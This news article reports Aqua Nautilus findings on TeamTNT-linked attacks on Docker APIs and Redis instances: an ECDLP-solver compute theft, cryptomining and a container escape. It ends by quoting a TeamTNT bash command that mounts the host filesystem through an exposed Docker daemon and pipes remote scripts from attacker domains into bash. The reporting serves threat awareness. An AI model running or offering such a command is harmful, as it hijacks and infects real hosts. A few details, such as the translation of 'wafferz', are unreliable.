A former threat actor has returned with new attacks targeting encryption keys, the cloud, and containers

By Somya Agrawal Published on September 21, 2022, 20:40 IST

A former threat actor has returned with new attacks targeting encryption keys, the cloud, and containers.

Three assaults that mirrored those committed by TeamTNT, a threat actor that targets online resources like Kubernetes clusters, Redis servers, and Docker APIs in the cloud, were found by the Aqua Nautilus research team.

As they invented new methods in 2020, these cybercriminals are recognized for their creativity and ability to attack cloud environments. Following several successful campaigns in 2020 and 2021, they announced their retirement on Twitter. However, Aqua Nautilus alleges that despite this, “their infrastructure continued to automatically infect new victims with old malware as their tools included various worms that could scan and infect new targets.”

In other words, worms and obsolete malware still automatically search for and infect fresh targets. The researchers are confident that the threat actor is back because their honeypots discovered TeamTNT indications and tools in a series of three attacks during the first week of September.

The “Kangaroo attack” was the one that caused the most trouble. The other two are the “Cronb” and “What Will Be” attacks. These attacks specifically target APIs and Docker instances.

Researchers Discover a Connection in the Attacks

Private and public keys are necessary for the encryption of all internet communications, including SSL and SSH. The Elliptic Curve Discrete Logarithm Problem is the name of the mathematical formula used to make the procedure irreversible (ECDLP).

The fundamental tenet of contemporary cryptography is that encryption must be a one-way process. Only the key is intended to be able to open the gate. However, according to Aqua Nautilus researchers, the shell script used for the Kangaroo assault contained evidence of the Pollard’s Kangaroo interval ECDLP solver method.

The attackers send a command line that copies a fork of the SECP256K1 solver algorithm using a Docker Daemon that has been misconfigured. The procedure may be relatively complex, but the end result is straightforward: stealing the victims’ processing resources in an effort to solve the mathematical riddle.

ECDLP has a theoretically very high difficulty, but it also has a very big potential payout because it would give thieves access to almost everything online, including Bitcoin wallets.
Such a tactic is very widespread in the field of malware, for instance, cryptominers. The attackers make use of the idling computing capacity of the targeted PCs to mine bitcoin. This is done through the “Cronb attack,” which targets vulnerable Redis instances and launches a cryptomining assault.

Researchers found that even though TeamTNT had previously carried out assaults under the name “Cronb,” the same methods and instruments had been employed to locate vulnerable Redis instances, acquire persistence, siphon off resources, and avoid detection. However, the script has been changed to send users to brand-new command and control sites.

The third and final assault, “What Will Be,” downloads malicious malware and sends illegal commands using weak Docker APIs. The hackers can exit the Docker container by taking advantage of a bug in the release agent, a script that is invoked at the end of each process in privileged containers.

Researchers were able to trace the Kangaroo attack back to a GitHub project. Bash scripts and comments mentioning TeamTNT can be found in a second repository called “dock,” which is controlled by the associated GitHub account “wafferz,” which is German for “armory”:

#docker -H tcp://$ipaddy:$2 run -d –name teamtnt -v /:/mnt alpine chroot /mnt /bin/sh -c “curl -sLk http://teamtnt.red/Kuben/sh/scan.sh | bash;curl -# -Lk http://chimaera.cc/sh/mo.sh | bash;while true; do sleep 9999;done”